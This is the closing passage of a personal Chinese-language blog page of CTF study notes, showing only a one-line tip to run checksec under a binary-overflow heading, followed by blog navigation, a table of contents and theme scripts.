<h2 id="溢出"><a href="#溢出" class="headerlink" title="溢出"></a>溢出</h2><h4 id="技巧-2"><a href="#技巧-2" class="headerlink" title="技巧"></a>技巧</h4><p><code>checksec</code>查看防御措施</p>
<h4 id="工具-2"><a href="#工具-2" class="headerlink" title="工具"></a>工具</h4>
      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/笔记/" rel="tag"># 笔记</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/02/14/攻击者视角培训笔记/" rel="next" title="攻击者视角培训笔记">
                <i class="fa fa-chevron-left"></i> 攻击者视角培训笔记
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/03/12/SQL注入学习笔记/" rel="prev" title="SQL注入学习笔记">
                SQL注入学习笔记 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/user.png"
               alt="zgjx" />
          <p class="site-author-name" itemprop="name">zgjx</p>
           
              <p class="site-description motion-element" itemprop="description">My blog</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">30</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">5</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">6</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/zgjx6" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://www.jianshu.com/u/780c677673ef" target="_blank" title="Jianshu">
                  
                    <i class="fa fa-fw fa-book"></i>
                  
                  Jianshu
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#CTF"><span class="nav-number">1.</span> <span class="nav-text">CTF</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#杂项"><span class="nav-number">2.</span> <span class="nav-text">杂项</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#常用"><span class="nav-number">2.0.1.</span> <span class="nav-text">常用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Wireshark"><span class="nav-number">2.0.2.</span> <span class="nav-text">Wireshark</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#隐写术"><span class="nav-number">2.0.3.</span> <span class="nav-text">隐写术</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#加密"><span class="nav-number">3.</span> <span class="nav-text">加密</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#文章-工具"><span class="nav-number">3.0.1.</span> <span class="nav-text">文章/工具</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#常见加密"><span class="nav-number">3.0.2.</span> <span class="nav-text">常见加密</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#字母频率"><span class="nav-number">3.0.3.</span> <span class="nav-text">字母频率</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#技巧"><span class="nav-number">3.0.4.</span> <span class="nav-text">技巧</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#RSA"><span class="nav-number">3.0.5.</span> <span class="nav-text">RSA</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#数论"><span class="nav-number">3.0.6.</span> <span class="nav-text">数论</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Web"><span class="nav-number">4.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#常用-1"><span class="nav-number">4.0.1.</span> <span class="nav-text">常用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#上传漏洞"><span class="nav-number">4.0.2.</span> <span class="nav-text">上传漏洞</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#PHP"><span class="nav-number">4.0.3.</span> <span class="nav-text">PHP</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#python"><span class="nav-number">4.0.4.</span> <span class="nav-text">python</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#工具"><span class="nav-number">4.0.5.</span> <span class="nav-text">工具</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#其他"><span class="nav-number">4.0.6.</span> <span class="nav-text">其他</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#逆向"><span class="nav-number">5.</span> <span class="nav-text">逆向</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#工具-1"><span class="nav-number">5.0.1.</span> <span class="nav-text">工具</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#文章"><span class="nav-number">5.0.2.</span> <span class="nav-text">文章</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#技巧-1"><span class="nav-number">5.0.3.</span> <span class="nav-text">技巧</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#安卓"><span class="nav-number">5.0.4.</span> <span class="nav-text">安卓</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#溢出"><span class="nav-number">6.</span> <span class="nav-text">溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#技巧-2"><span class="nav-number">6.0.1.</span> <span class="nav-text">技巧</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#工具-2"><span class="nav-number">6.0.2.</span> <span class="nav-text">工具</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zgjx</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>


        

        
      </div>
    </footer>

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  





  





  






  





  

  

  

  
  <script type="text/javascript" src="/js/src/js.cookie.js?v=5.1.1"></script>
  <script type="text/javascript" src="/js/src/scroll-cookie.js?v=5.1.1"></script>


  

</body>
</html>
